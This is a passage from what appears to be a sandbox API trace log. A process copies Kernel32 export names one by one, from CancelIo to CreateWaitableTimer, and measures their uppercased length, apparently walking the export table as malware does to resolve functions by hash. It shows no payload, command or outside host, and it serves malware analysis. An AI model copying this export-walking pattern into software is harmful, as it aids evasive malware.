(lpString="CALLNAMEDPIPEW") returned 14 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.599] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.599] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.599] lstrlenA (lpString="CANCELIO") returned 8 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.599] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.599] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.599] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.599] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.599] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.599] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.599] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.599] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.599] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.599] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.599] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.600] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.600] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.600] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.600] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.600] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.600] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.600] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.600] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.600] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.600] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.600] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.600] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.600] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.600] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.600] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.600] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.600] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.600] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.600] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.600] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.601] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.601] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.601] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.601] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.601] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.601] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.601] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.601] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.601] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.601] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.601] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.601] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.601] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.601] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.601] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.601] lstrlenA (lpString="COPYFILEA") returned 9 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.601] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.601] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.601] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.602] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.602] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.602] lstrlenA (lpString="COPYFILEW") returned 9 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.602] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.602] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.602] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.602] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.602] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.602] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.602] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.602] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.602] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.602] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.602] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.602] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.602] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.602] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.602] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.602] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.603] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.603] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.603] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.603] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.603] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.603] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.603] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.603] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.603] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.603] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.603] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.603] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.603] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.603] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.603] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.603] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.603] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.603] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.603] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.603] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.604] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.604] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.604] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.604] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.604] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.604] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.604] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.604] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.604] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.604] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.604] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.604] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.604] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.604] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.604] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.604] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.604] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.604] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.604] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.605] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.605] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.605] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.605] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.605] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.605] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.605] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.605] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.605] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.605] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.605] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.605] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.605] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.605] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.605] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.605] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.605] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.605] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.605] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.605] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.606] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.606] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.606] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: 